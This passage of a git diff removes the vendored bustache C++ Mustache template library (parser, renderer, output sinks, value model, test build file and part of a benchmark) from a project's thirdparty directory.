-    struct variable_visitor : value_printer<typename ContentVisitor::sink_type>
-    {
-        using base_type = value_printer<typename ContentVisitor::sink_type>;
-        
-        ContentVisitor& parent;
-
-        variable_visitor(ContentVisitor& parent, bool escaping)
-          : base_type{parent.sink, escaping}, parent(parent)
-        {}
-
-        using base_type::operator();
-
-        void operator()(lambda0f const& data) const
-        {
-            auto fmt(data());
-            for (auto const& content : fmt.contents())
-                visit(parent, content);
-        }
-    };
-
-    template<class ContentVisitor>
-    struct section_visitor
-    {
-        using result_type = bool;
-
-        ContentVisitor& parent;
-        ast::content_list const& contents;
-        bool const inverted;
-
-        bool operator()(object const& data) const
-        {
-            if (!inverted)
-            {
-                content_scope scope{parent.scope, data};
-                auto old_scope = parent.scope;
-                parent.scope = &scope;
-                for (auto const& content : contents)
-                    visit(parent, content);
-                parent.scope = old_scope;
-            }
-            return false;
-        }
-
-        bool operator()(array const& data) const
-        {
-            if (inverted)
-                return data.empty();
-
-            for (auto const& val : data)
-            {
-                parent.cursor = val.get_pointer();
-                if (auto obj = get<object>(&val))
-                {
-                    content_scope scope{parent.scope, *obj};
-                    auto old_scope = parent.scope;
-                    parent.scope = &scope;
-                    for (auto const& content : contents)
-                        visit(parent, content);
-                    parent.scope = old_scope;
-                }
-                else
-                {
-                    for (auto const& content : contents)
-                        visit(parent, content);
-                }
-            }
-            return false;
-        }
-
-        bool operator()(bool data) const
-        {
-            return data ^ inverted;
-        }
-
-        // The 2 overloads below are not necessary but to suppress
-        // the stupid MSVC warning.
-        bool operator()(int data) const
-        {
-            return !!data ^ inverted;
-        }
-
-        bool operator()(double data) const
-        {
-            return !!data ^ inverted;
-        }
-
-        bool operator()(std::string const& data) const
-        {
-            return !data.empty() ^ inverted;
-        }
-
-        bool operator()(std::nullptr_t) const
-        {
-            return inverted;
-        }
-
-        bool operator()(lambda0v const& data) const
-        {
-            return inverted ? false : visit(*this, data());
-        }
-
-        bool operator()(lambda0f const& data) const
-        {
-            if (!inverted)
-            {
-                auto fmt(data());
-                for (auto const& content : fmt.contents())
-                    visit(parent, content);
-            }
-            return false;
-        }
-
-        bool operator()(lambda1v const& data) const
-        {
-            return inverted ? false : visit(*this, data(contents));
-        }
-
-        bool operator()(lambda1f const& data) const
-        {
-            if (!inverted)
-            {
-                auto fmt(data(contents));
-                for (auto const& content : fmt.contents())
-                    visit(parent, content);
-            }
-            return false;
-        }
-    };
-
-    template<class Sink, class Context>
-    struct content_visitor : content_visitor_base
-    {
-        using sink_type = Sink;
-
-        Sink const& sink;
-        Context const& context;
-        std::string indent;
-        bool needs_indent;
-        bool const escaping;
-
-        content_visitor
-        (
-            content_scope const& scope, value::pointer cursor,
-            Sink const &sink, Context const &context, bool escaping
-        )
-          : content_visitor_base{&scope, cursor, {}, {}}
-          , sink(sink), context(context), needs_indent(), escaping(escaping)
-        {}
-
-        void operator()(ast::text const& text)
-        {
-            auto i = text.begin();
-            auto e = text.end();
-            assert(i != e && "empty text shouldn't be in ast");
-            if (indent.empty())
-            {
-                sink(i, e);
-                return;
-            }
-            --e; // Don't flush indent on last newline.
-            auto const ib = indent.data();
-            auto const ie = ib + indent.size();
-            if (needs_indent)
-                sink(ib, ie);
-            auto i0 = i;
-            while (i != e)
-            {
-                if (*i++ == '\n')
-                {
-                    sink(i0, i);
-                    sink(ib, ie);
-                    i0 = i;
-                }
-            }
-            needs_indent = *i++ == '\n';
-            sink(i0, i);
-        }
-        
-        void operator()(ast::variable const& variable)
-        {
-            if (auto pv = resolve(variable.key))
-            {
-                if (needs_indent)
-                {
-                    sink(indent.data(), indent.data() + indent.size());
-                    needs_indent = false;
-                }
-                variable_visitor<content_visitor> visitor
-                {
-                    *this, escaping && !variable.tag
-                };
-                visit(visitor, *pv);
-            }
-        }
-        
-        void operator()(ast::section const& section)
-        {
-            bool inverted = section.tag == '^';
-            auto old_cursor = cursor;
-            if (auto next = resolve(section.key))
-            {
-                cursor = next;
-                section_visitor<content_visitor> visitor
-                {
-                    *this, section.contents, inverted
-                };
-                if (!visit(visitor, *cursor))
-                {
-                    cursor = old_cursor;
-                    return;
-                }
-            }
-            else if (!inverted)
-                return;
-                
-            for (auto const& content : section.contents)
-                visit(*this, content);
-            cursor = old_cursor;
-        }
-        
-        void operator()(ast::partial const& partial)
-        {
-            auto it = context.find(partial.key);
-            if (it != context.end())
-            {
-                if (it->second.contents().empty())
-                    return;
-
-                auto old_size = indent.size();
-                auto old_chain = chain.size();
-                indent += partial.indent;
-                needs_indent |= !partial.indent.empty();
-                if (!partial.overriders.empty())
-                    chain.push_back(&partial.overriders);
-                for (auto const& content : it->second.contents())
-                    visit(*this, content);
-                chain.resize(old_chain);
-                indent.resize(old_size);
-            }
-        }
-
-        void operator()(ast::block const& block)
-        {
-            auto pc = find_override(block.key);
-            if (!pc)
-                pc = &block.contents;
-            for (auto const& content : *pc)
-                visit(*this, content);
-        }
-
-        void operator()(ast::null) const {} // never called
-    };
-}}
-
-namespace bustache
-{
-    template<class Sink>
-    inline void generate
-    (
-        Sink& sink, format const& fmt, value::view const& data,
-        option_type flag = normal
-    )
-    {
-        generate(sink, fmt, data, no_context::dummy(), flag);
-    }
-    
-    template<class Sink, class Context>
-    void generate
-    (
-        Sink& sink, format const& fmt, value::view const& data,
-        Context const& context, option_type flag = normal
-    )
-    {
-        object const empty;
-        auto obj = get<object>(&data);
-        detail::content_scope scope{nullptr, obj ? *obj : empty};
-        detail::content_visitor<Sink, Context> visitor{scope, data.get_pointer(), sink, context, flag};
-        for (auto const& content : fmt.contents())
-            visit(visitor, content);
-    }
-}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/generate/ostream.hpp b/thirdparty/bustache/include/bustache/generate/ostream.hpp
deleted file mode 100644
index 8f1a83e..0000000
--- a/thirdparty/bustache/include/bustache/generate/ostream.hpp
+++ /dev/null
@@ -1,60 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_GENERATE_OSTREAM_HPP_INCLUDED
-#define BUSTACHE_GENERATE_OSTREAM_HPP_INCLUDED
-
-#include <iostream>
-#include <bustache/generate.hpp>
-
-namespace bustache { namespace detail
-{
-    template<class CharT, class Traits>
-    struct ostream_sink
-    {
-        std::basic_ostream<CharT, Traits>& out;
-
-        void operator()(char const* it, char const* end) const
-        {
-            out.write(it, end - it);
-        }
-
-        template<class T>
-        void operator()(T data) const
-        {
-            out << data;
-        }
-
-        void operator()(bool data) const
-        {
-            out << (data ? "true" : "false");
-        }
-    };
-}}
-
-namespace bustache
-{
-    template<class CharT, class Traits, class Context>
-    void generate_ostream
-    (
-        std::basic_ostream<CharT, Traits>& out, format const& fmt,
-        value::view const& data, Context const& context, option_type flag
-    )
-    {
-        detail::ostream_sink<CharT, Traits> sink{out};
-        generate(sink, fmt, data, context, flag);
-    }
-
-    // This is instantiated in src/generate.cpp.
-    extern template
-    void generate_ostream
-    (
-        std::ostream& out, format const& fmt,
-        value::view const& data, detail::any_context const& context, option_type flag
-    );
-}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/generate/string.hpp b/thirdparty/bustache/include/bustache/generate/string.hpp
deleted file mode 100644
index cd1ddb4..0000000
--- a/thirdparty/bustache/include/bustache/generate/string.hpp
+++ /dev/null
@@ -1,108 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_GENERATE_STRING_HPP_INCLUDED
-#define BUSTACHE_GENERATE_STRING_HPP_INCLUDED
-
-#include <cstdio> // for snprintf
-#include <string>
-#include <bustache/generate.hpp>
-
-namespace bustache { namespace detail
-{
-    template<class String>
-    struct string_sink
-    {
-        String& out;
-
-        void operator()(char const* it, char const* end) const
-        {
-            out.insert(out.end(), it, end);
-        }
-
-        void operator()(int data) const
-        {
-            append_num("%d", data);
-        }
-
-        void operator()(double data) const
-        {
-            append_num("%g", data);
-        }
-
-        void operator()(bool data) const
-        {
-            data ? append("true") : append("false");
-        }
-
-        template<std::size_t N>
-        void append(char const (&str)[N]) const
-        {
-            out.insert(out.end(), str, str + (N - 1));
-        }
-
-        template<class T>
-        void append_num(char const* fmt, T data) const
-        {
-            char buf[64];
-            char* p;
-            auto old_size = out.size();
-            auto capacity = out.capacity();
-            auto bufsize = capacity - old_size;
-            if (bufsize)
-            {
-                out.resize(capacity);
-                p = &out.front() + old_size;
-            }
-            else
-            {
-                bufsize = sizeof(buf);
-                p = buf;
-            }
-            auto n = std::snprintf(p, bufsize, fmt, data);
-            if (n < 0) // error
-                return;
-            if (unsigned(n + 1) <= bufsize)
-            {
-                if (p == buf)
-                {
-                    out.insert(out.end(), p, p + n);
-                    return;
-                }
-            }
-            else
-            {
-                out.resize(old_size + n + 1); // '\0' will be written
-                std::snprintf(&out.front() + old_size, n + 1, fmt, data);
-            }
-            out.resize(old_size + n);
-        }
-    };
-}}
-
-namespace bustache
-{
-    template<class String, class Context>
-    void generate_string
-    (
-        String& out, format const& fmt,
-        value::view const& data, Context const& context, option_type flag
-    )
-    {
-        detail::string_sink<String> sink{out};
-        generate(sink, fmt, data, context, flag);
-    }
-
-    // This is instantiated in src/generate.cpp.
-    extern template
-    void generate_string
-    (
-        std::string& out, format const& fmt,
-        value::view const& data, detail::any_context const& context, option_type flag
-    );
-}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/model.hpp b/thirdparty/bustache/include/bustache/model.hpp
deleted file mode 100644
index 87b7a28..0000000
--- a/thirdparty/bustache/include/bustache/model.hpp
+++ /dev/null
@@ -1,165 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2014-2017 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_MODEL_HPP_INCLUDED
-#define BUSTACHE_MODEL_HPP_INCLUDED
-
-#include <bustache/format.hpp>
-#include <bustache/detail/variant.hpp>
-#include <bustache/detail/any_context.hpp>
-#include <vector>
-#include <functional>
-#include <boost/unordered_map.hpp>
-
-namespace bustache
-{
-    class value;
-
-    using array = std::vector<value>;
-
-    // We use boost::unordered_map because it allows incomplete type.
-    using object = boost::unordered_map<std::string, value>;
-
-    using lambda0v = std::function<value()>;
-
-    using lambda0f = std::function<format()>;
-
-    using lambda1v = std::function<value(ast::content_list const&)>;
-
-    using lambda1f = std::function<format(ast::content_list const&)>;
-
-    namespace detail
-    {
-        struct bool_
-        {
-            bool_(bool);
-        };
-    }
-
-#define BUSTACHE_VALUE(X, D)                                                    \
-    X(0, std::nullptr_t, D)                                                     \
-    X(1, bool, D)                                                               \
-    X(2, int, D)                                                                \
-    X(3, double, D)                                                             \
-    X(4, std::string, D)                                                        \
-    X(5, array, D)                                                              \
-    X(6, lambda0v, D)                                                           \
-    X(7, lambda0f, D)                                                           \
-    X(8, lambda1v, D)                                                           \
-    X(9, lambda1f, D)                                                           \
-    X(10, object, D)                                                            \
-/***/
-
-    class value : public variant_base<value>
-    {
-        static std::nullptr_t match_type(std::nullptr_t);
-        static int match_type(int);
-        // Use a fake bool_ to prevent unintended bool conversion.
-        static bool match_type(detail::bool_);
-        static double match_type(double);
-        static std::string match_type(std::string);
-        static array match_type(array);
-        static lambda0v match_type(lambda0v);
-        static lambda0f match_type(lambda0f);
-        static lambda1v match_type(lambda1v);
-        static lambda1f match_type(lambda1f);
-        static object match_type(object);
-        // Need to override for `char const*`, otherwise `bool` will be chosen
-        static std::string match_type(char const*);
-
-    public:
-
-        struct view;
-        using pointer = variant_ptr<view>;
-
-        Zz_BUSTACHE_VARIANT_DECL(value, BUSTACHE_VALUE, false)
-
-        value() noexcept : _which(0), _0() {}
-
-        pointer get_pointer() const
-        {
-            return {_which, _storage};
-        }
-    };
-
-    struct value::view : variant_base<view>
-    {
-        using switcher = value::switcher;
-
-#define BUSTACHE_VALUE_VIEW_CTOR(N, U, D)                                       \
-        view(U const& data) noexcept : _which(N), _data(&data) {}
-        BUSTACHE_VALUE(BUSTACHE_VALUE_VIEW_CTOR,)
-#undef BUSTACHE_VALUE_VIEW_CTOR
-
-        view(value const& data) noexcept
-          : _which(data._which), _data(data._storage)
-        {}
-
-        view(unsigned which, void const* data) noexcept
-          : _which(which), _data(data)
-        {}
-
-        unsigned which() const
-        {
-            return _which;
-        }
-
-        void const* data() const
-        {
-            return _data;
-        }
-
-        pointer get_pointer() const
-        {
-            return {_which, _data};
-        }
-
-    private:
-
-        unsigned _which;
-        void const* _data;
-    };
-#undef BUSTACHE_VALUE
-}
-
-namespace bustache
-{
-    // Forward decl only.
-    template<class CharT, class Traits, class Context>
-    void generate_ostream
-    (
-        std::basic_ostream<CharT, Traits>& out, format const& fmt,
-        value::view const& data, Context const& context, option_type flag
-    );
-
-    // Forward decl only.
-    template<class String, class Context>
-    void generate_string
-    (
-        String& out, format const& fmt,
-        value::view const& data, Context const& context, option_type flag
-    );
-
-    template<class CharT, class Traits, class T, class Context,
-        typename std::enable_if<std::is_constructible<value::view, T>::value, bool>::type = true>
-    inline std::basic_ostream<CharT, Traits>&
-    operator<<(std::basic_ostream<CharT, Traits>& out, manipulator<T, Context> const& manip)
-    {
-        generate_ostream(out, manip.fmt, manip.data, detail::any_context(manip.context), manip.flag);
-        return out;
-    }
-
-    template<class T, class Context,
-        typename std::enable_if<std::is_constructible<value::view, T>::value, bool>::type = true>
-    inline std::string to_string(manipulator<T, Context> const& manip)
-    {
-        std::string ret;
-        generate_string(ret, manip.fmt, manip.data, detail::any_context(manip.context), manip.flag);
-        return ret;
-    }
-}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/src/format.cpp b/thirdparty/bustache/src/format.cpp
deleted file mode 100644
index 7b56084..0000000
--- a/thirdparty/bustache/src/format.cpp
+++ /dev/null
@@ -1,484 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2014-2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#include <cctype>
-#include <utility>
-#include <cstring>
-#include <bustache/format.hpp>
-
-namespace bustache { namespace parser { namespace
-{
-    using delim = std::pair<std::string, std::string>;
-
-    template<class I>
-    inline void skip(I& i, I e)
-    {
-        while (i != e && std::isspace(*i))
-            ++i;
-    }
-
-    template<class I>
-    inline bool parse_char(I& i, I e, char c)
-    {
-        if (i != e && *i == c)
-        {
-            ++i;
-            return true;
-        }
-        return false;
-    }
-
-    template<class I>
-    inline bool parse_lit(I& i, I e, boost::string_ref const& str)
-    {
-        I i0 = i;
-        for (char c : str)
-        {
-            if (!parse_char(i, e, c))
-            {
-                i = i0;
-                return false;
-            }
-        }
-        return true;
-    }
-
-    template<class I>
-    void expect_key(I& i, I e, delim& d, std::string& attr, bool suffix)
-    {
-        skip(i, e);
-        I i0 = i;
-        while (i != e)
-        {
-            I i1 = i;
-            skip(i, e);
-            if (!suffix || parse_char(i, e, '}'))
-            {
-                skip(i, e);
-                if (parse_lit(i, e, d.second))
-                {
-                    attr.assign(i0, i1);
-                    if (i0 == i1)
-                        throw format_error(error_badkey);
-                    return;
-                }
-            }
-            if (i != e)
-                ++i;
-        }
-        throw format_error(error_badkey);
-    }
-
-    template<class I>
-    bool parse_content
-    (
-        I& i0, I& i, I e, delim& d, bool& pure,
-        boost::string_ref& text, ast::content& attr,
-        boost::string_ref const& section
-    );
-
-    template<class I>
-    void parse_contents
-    (
-        I i0, I& i, I e, delim& d, bool& pure,
-        ast::content_list& attr, boost::string_ref const& section
-    );
-
-    template<class I>
-    I process_pure(I& i, I e, bool& pure)
-    {
-        I i0 = i;
-        if (pure)
-        {
-            while (i != e)
-            {
-                if (*i == '\n')
-                {
-                    i0 = ++i;
-                    break;
-                }
-                else if (std::isspace(*i))
-                    ++i;
-                else
-                {
-                    pure = false;
-                    break;
-                }
-            }
-        }
-        return i0;
-    }
-
-    template<class I>
-    inline bool expect_block(I& i, I e, delim& d, bool& pure, ast::block& attr)
-    {
-        expect_key(i, e, d, attr.key, false);
-        I i0 = process_pure(i, e, pure);
-        bool standalone = pure;
-        parse_contents(i0, i, e, d, pure, attr.contents, attr.key);
-        return standalone;
-    }
-
-    template<class I>
-    bool expect_inheritance(I& i, I e, delim& d, bool& pure, ast::partial& attr)
-    {
-        expect_key(i, e, d, attr.key, false);
-        I i0 = process_pure(i, e, pure);
-        bool standalone = pure;
-        for (boost::string_ref text;;)
-        {
-            ast::content a;
-            auto end = parse_content(i0, i, e, d, pure, text, a, attr.key);
-            if (auto p = get<ast::block>(&a))
-                attr.overriders.emplace(std::move(p->key), std::move(p->contents));
-            if (end)
-                break;
-        }
-        return standalone;
-    }
-
-    template<class I>
-    void expect_comment(I& i, I e, delim& d)
-    {
-        while (!parse_lit(i, e, d.second))
-        {
-            if (i == e)
-                throw format_error(error_delim);
-            ++i;
-        }
-    }
-
-    template<class I>
-    void expect_set_delim(I& i, I e, delim& d)
-    {
-        skip(i, e);
-        I i0 = i;
-        while (i != e)
-        {
-            if (std::isspace(*i))
-                break;
-            ++i;
-        }
-        if (i == e)
-            throw format_error(error_baddelim);
-        d.first.assign(i0, i);
-        skip(i, e);
-        i0 = i;
-        I i1 = i;
-        for (;; ++i)
-        {
-            if (i == e)
-                throw format_error(error_set_delim);
-            if (*i == '=')
-            {
-                i1 = i;
-                break;
-            }
-            if (std::isspace(*i))
-            {
-                i1 = i;
-                skip(++i, e);
-                if (i == e || *i != '=')
-                    throw format_error(error_set_delim);
-                break;
-            }
-        }
-        if (i0 == i1)
-            throw format_error(error_baddelim);
-        std::string new_close(i0, i1);
-        skip(++i, e);
-        if (!parse_lit(i, e, d.second))
-            throw format_error(error_delim);
-        d.second = std::move(new_close);
-    }
-
-    struct tag_result
-    {
-        bool is_end_section;
-        bool check_standalone;
-        bool is_standalone;
-    };
-
-    template<class I>
-    tag_result expect_tag
-    (
-        I& i, I e, delim& d, bool& pure,
-        ast::content& attr, boost::string_ref const& section
-    )
-    {
-        skip(i, e);
-        if (i == e)
-            throw format_error(error_badkey);
-        tag_result ret{};
-        switch (*i)
-        {
-        case '#':
-        case '^':
-        {
-            ast::section a;
-            a.tag = *i;
-            ret.is_standalone = expect_block(++i, e, d, pure, a);
-            attr = std::move(a);
-            return ret;
-        }
-        case '/':
-            skip(++i, e);
-            if (section.empty() || !parse_lit(i, e, section))
-                throw format_error(error_section);
-            skip(i, e);
-            if (!parse_lit(i, e, d.second))
-                throw format_error(error_delim);
-            ret.check_standalone = pure;
-            ret.is_end_section = true;
-            break;
-        case '!':
-        {
-            expect_comment(++i, e, d);
-            ret.check_standalone = pure;
-            break;
-        }
-        case '=':
-        {
-            expect_set_delim(++i, e, d);
-            ret.check_standalone = pure;
-            break;
-        }
-        case '>':
-        {
-            ast::partial a;
-            expect_key(++i, e, d, a.key, false);
-            attr = std::move(a);
-            ret.check_standalone = pure;
-            break;
-        }
-        case '&':
-        case '{':
-        {
-            ast::variable a;
-            a.tag = *i;
-            expect_key(++i, e, d, a.key, a.tag == '{');
-            attr = std::move(a);
-            pure = false;
-            break;
-        }
-        // Extensions
-        case '<':
-        {
-            ast::partial a;
-            ret.is_standalone = expect_inheritance(++i, e, d, pure, a);
-            attr = std::move(a);
-            return ret;
-        }
-        case '$':
-        {
-            ast::block a;
-            ret.is_standalone = expect_block(++i, e, d, pure, a);
-            attr = std::move(a);
-            return ret;
-        }
-        default:
-            ast::variable a;
-            expect_key(i, e, d, a.key, false);
-            attr = std::move(a);
-            pure = false;
-            break;
-        }
-        return ret;
-    }
-
-    // return true if it ends
-    template<class I>
-    bool parse_content
-    (
-        I& i0, I& i, I e, delim& d, bool& pure,
-        boost::string_ref& text, ast::content& attr,
-        boost::string_ref const& section
-    )
-    {
-        for (I i1 = i; i != e;)
-        {
-            if (*i == '\n')
-            {
-                pure = true;
-                i1 = ++i;
-            }
-            else if (std::isspace(*i))
-                ++i;
-            else
-            {
-                I i2 = i;
-                if (parse_lit(i, e, d.first))
-                {
-                    tag_result tag(expect_tag(i, e, d, pure, attr, section));
-                    text = boost::string_ref(i0, i1 - i0);
-                    if (tag.check_standalone)
-                    {
-                        I i3 = i;
-                        while (i != e)
-                        {
-                            if (*i == '\n')
-                            {
-                                ++i;
-                                break;
-                            }
-                            else if (std::isspace(*i))
-                                ++i;
-                            else
-                            {
-                                pure = false;
-                                text = boost::string_ref(i0, i2 - i0);
-                                // For end-section, we move the current pos (i)
-                                // since i0 is local to the section and is not
-                                // propagated upwards.
-                                (tag.is_end_section ? i : i0) = i3;
-                                return tag.is_end_section;
-                            }
-                        }
-                        tag.is_standalone = true;
-                    }
-                    if (!tag.is_standalone)
-                        text = boost::string_ref(i0, i2 - i0);
-                    else if (auto partial = get<ast::partial>(&attr))
-                        partial->indent.assign(i1, i2 - i1);
-                    i0 = i;
-                    return i == e || tag.is_end_section;
-                }
-                else
-                {
-                    pure = false;
-                    ++i;
-                }
-            }
-        }
-        text = boost::string_ref(i0, i - i0);
-        return true;
-    }
-
-    template<class I>
-    void parse_contents
-    (
-        I i0, I& i, I e, delim& d, bool& pure,
-        ast::content_list& attr, boost::string_ref const& section
-    )
-    {
-        for (;;)
-        {
-            boost::string_ref text;
-            ast::content a;
-            auto end = parse_content(i0, i, e, d, pure, text, a, section);
-            if (!text.empty())
-                attr.push_back(text);
-            if (!is_null(a))
-                attr.push_back(std::move(a));
-            if (end)
-                return;
-        }
-    }
-
-    template<class I>
-    inline void parse_start(I& i, I e, ast::content_list& attr)
-    {
-        delim d("{{", "}}");
-        bool pure = true;
-        parse_contents(i, i, e, d, pure, attr, {});
-    }
-}}}
-
-namespace bustache
-{
-    static char const* get_error_string(error_type err)
-    {
-        switch (err)
-        {
-        case error_set_delim:
-            return "format_error(error_set_delim): mismatched '='";
-        case error_baddelim:
-            return "format_error(error_baddelim): invalid delimiter";
-        case error_delim:
-            return "format_error(error_delim): mismatched delimiter";
-        case error_section:
-            return "format_error(error_section): mismatched end section tag";
-        case error_badkey:
-            return "format_error(error_badkey): invalid key";
-        default:
-            return "format_error";
-        }
-    }
-
-    format_error::format_error(error_type err)
-      : runtime_error(get_error_string(err)), _err(err)
-    {}
-
-    void format::init(char const* begin, char const* end)
-    {
-        parser::parse_start(begin, end, _contents);
-    }
-
-    struct accum_size
-    {
-        using result_type = std::size_t;
-
-        std::size_t operator()(ast::text const& text) const
-        {
-            return text.size();
-        }
-
-        std::size_t operator()(ast::section const& section) const
-        {
-            std::size_t n = 0;
-            for (auto const& content : section.contents)
-                n += visit(*this, content);
-            return n;
-        }
-
-        template <typename T>
-        std::size_t operator()(T const&) const
-        {
-            return 0;
-        }
-    };
-
-    std::size_t format::text_size() const
-    {
-        accum_size accum;
-        std::size_t n = 0;
-        for (auto const& content : _contents)
-            n += visit(accum, content);
-        return n;
-    }
-
-    struct copy_text_visitor
-    {
-        using result_type = void;
-
-        char* data;
-
-        void operator()(ast::text& text)
-        {
-            auto n = text.size();
-            std::memcpy(data, text.data(), n);
-            text = {data, n};
-            data += n;
-        }
-
-        void operator()(ast::section& section)
-        {
-            for (auto& content : section.contents)
-                visit(*this, content);
-        }
-
-        template <typename T>
-        void operator()(T const&) const {}
-    };
-
-    void format::copy_text(std::size_t n)
-    {
-        _text.reset(new char[n]);
-        copy_text_visitor visitor{_text.get()};
-        for (auto& content : _contents)
-            visit(visitor, content);
-    }
-}
\ No newline at end of file
diff --git a/thirdparty/bustache/src/generate.cpp b/thirdparty/bustache/src/generate.cpp
deleted file mode 100644
index 1e41455..0000000
--- a/thirdparty/bustache/src/generate.cpp
+++ /dev/null
@@ -1,77 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-
-#include <bustache/generate.hpp>
-#include <bustache/generate/ostream.hpp>
-#include <bustache/generate/string.hpp>
-
-namespace bustache { namespace detail
-{
-    value::pointer content_visitor_base::resolve(std::string const& key) const
-    {
-        auto ki = key.begin();
-        auto ke = key.end();
-        if (ki == ke)
-            return{};
-        value::pointer pv = nullptr;
-        if (*ki == '.')
-        {
-            if (++ki == ke)
-                return cursor;
-            auto k0 = ki;
-            while (*ki != '.' && ++ki != ke);
-            key_cache.assign(k0, ki);
-            pv = find(scope->data, key_cache);
-        }
-        else
-        {
-            auto k0 = ki;
-            while (ki != ke && *ki != '.') ++ki;
-            key_cache.assign(k0, ki);
-            pv = scope->lookup(key_cache);
-        }
-        if (ki == ke)
-            return pv;
-        if (auto obj = get<object>(pv))
-        {
-            auto k0 = ++ki;
-            while (ki != ke)
-            {
-                if (*ki == '.')
-                {
-                    key_cache.assign(k0, ki);
-                    obj = get<object>(find(*obj, key_cache));
-                    if (!obj)
-                        return nullptr;
-                    k0 = ++ki;
-                }
-                else
-                    ++ki;
-            }
-            key_cache.assign(k0, ki);
-            return find(*obj, key_cache);
-        }
-        return nullptr;
-    }
-}}
-
-namespace bustache
-{
-    template
-    void generate_ostream
-    (
-        std::ostream& out, format const& fmt,
-        value::view const& data, detail::any_context const& context, option_type flag
-    );
-
-    template
-    void generate_string
-    (
-        std::string& out, format const& fmt,
-        value::view const& data, detail::any_context const& context, option_type flag
-    );
-}
\ No newline at end of file
diff --git a/thirdparty/bustache/test/CMakeLists.txt b/thirdparty/bustache/test/CMakeLists.txt
deleted file mode 100644
index 74ecaee..0000000
--- a/thirdparty/bustache/test/CMakeLists.txt
+++ /dev/null
@@ -1,22 +0,0 @@
-find_package(Catch REQUIRED)
-
-add_library(Catch INTERFACE)
-target_include_directories(Catch INTERFACE ${CATCH_INCLUDE_DIR})
-
-function(add_catch_test name)
-    set(TEST_TARGET test_${name})
-    add_executable(${TEST_TARGET}
-        ${name}.cpp
-    )
-    target_link_libraries(${TEST_TARGET}
-        ${PROJECT_NAME} Catch
-    )
-    set_target_properties(${TEST_TARGET} PROPERTIES
-        CXX_STANDARD 14
-    )
-    add_test(${TEST_TARGET} ${TEST_TARGET})
-endfunction()
-
-add_catch_test(specs)
-
-add_catch_test(variant)
diff --git a/thirdparty/bustache/test/benchmark.cpp b/thirdparty/bustache/test/benchmark.cpp
deleted file mode 100644
index d9b434c..0000000
--- a/thirdparty/bustache/test/benchmark.cpp
+++ /dev/null
@@ -1,238 +0,0 @@
-#include <benchmark/benchmark.h>
-#include <bustache/model.hpp>
-#include <mstch/mstch.hpp>
-#include <mustache.hpp>
-
-static char tmp[] =
-R"(<h1>{{header}}</h1>
-{{#bug}}
-{{/bug}}
-
-{{# items}}
-  {{#first}}
-    <li><strong>{{name}}</strong></li>
-  {{/first}}
-  {{#link}}
-    <li><a {{>href}}>{{name}}</a></li>
-  {{/link}}
-{{ /items}}
-
-{{#empty}}
-  <p>The list is empty.</p>
-{{/ empty }}
-
-{{=[ ]=}}
-
-[#array]([.])[/array]
-
-[#items]
-[count]->[count]->[count]
-[/items]
-
-[a.b.c] == [#a][#b][c][/b][/a]
-
-<div class="comments">
-    <h3>[header]</h3>
-    <ul>
-        [#comments]
-        <li class="comment">
-            <h5>[name]</h5>
-            <p>[body]</p>
-        </li>
-        <!--[count]-->
-        [/comments]
-    </ul>
-</div>)";
-
-static void bustache_usage(benchmark::State& state)
-{
-    using namespace bustache;
-
-    boost::unordered_map<std::string, bustache::format> context
-    {
-        {"href", "href=\"{{url}}\""_fmt}
-    };
-
-    int n = 0;
-    object data
-    {
-        {"header", "Colors"},
-        {"items",
-            array
-            {
-                object
-                {
-                    {"name", "red"},
-                    {"first", true},
-                    {"url", "#Red"}
-                },
-                object
-                {
-                    {"name", "green"},
-                    {"link", true},
-                    {"url", "#Green"}
-                },
-                object
-                {
-                    {"name", "blue"},
-                    {"link", true},
-                    {"url", "#Blue"}
-                }
-            }
-        },
-        {"empty", false},
-        {"count", [&n] { return ++n; }},
-        {"array", array{1, 2, 3}},
-        {"a", object{{"b", object{{"c", true}}}}},
-        {"comments",
-            array
-            {
-                object
-                {
-                    {"name", "Joe"},
-                    {"body", "<html> should be escaped"}
-                },
-                object
-                {
-                    {"name", "Sam"},
-                    {"body", "{{mustache}} can be seen"}
-                },
-                object
-                {
-                    {"name", "New"},
-                    {"body", "break\nup"}
-                }
-            }
-        }
-    };
-
-    format fmt(tmp);
-
-    while (state.KeepRunning())
-    {
-        n = 0;
-        to_string(fmt(data, context, escape_html));
-    }
-}
-
-static void mstch_usage(benchmark::State& state)
-{
-    using namespace mstch;
-    using namespace std::string_literals;
-
-    std::map<std::string, std::string> context
-    {
-        {"href", "href=\"{{url}}\""}
-    };
-
-    int n = 0;
-    map data
-    {
-        {"header", "Colors"s},
-        {"items",
-            array
-            {
-                map
-                {
-                    {"name", "red"s},
-                    {"first", true},
-                    {"url", "#Red"s}
-                },
-                map
-                {
-                    {"name", "green"s},
-                    {"link", true},
-                    {"url", "#Green"s}
-                },
-                map
-                {
-                    {"name", "blue"s},
-                    {"link", true},
-                    {"url", "#Blue"s}
-                }
-            }
-        },
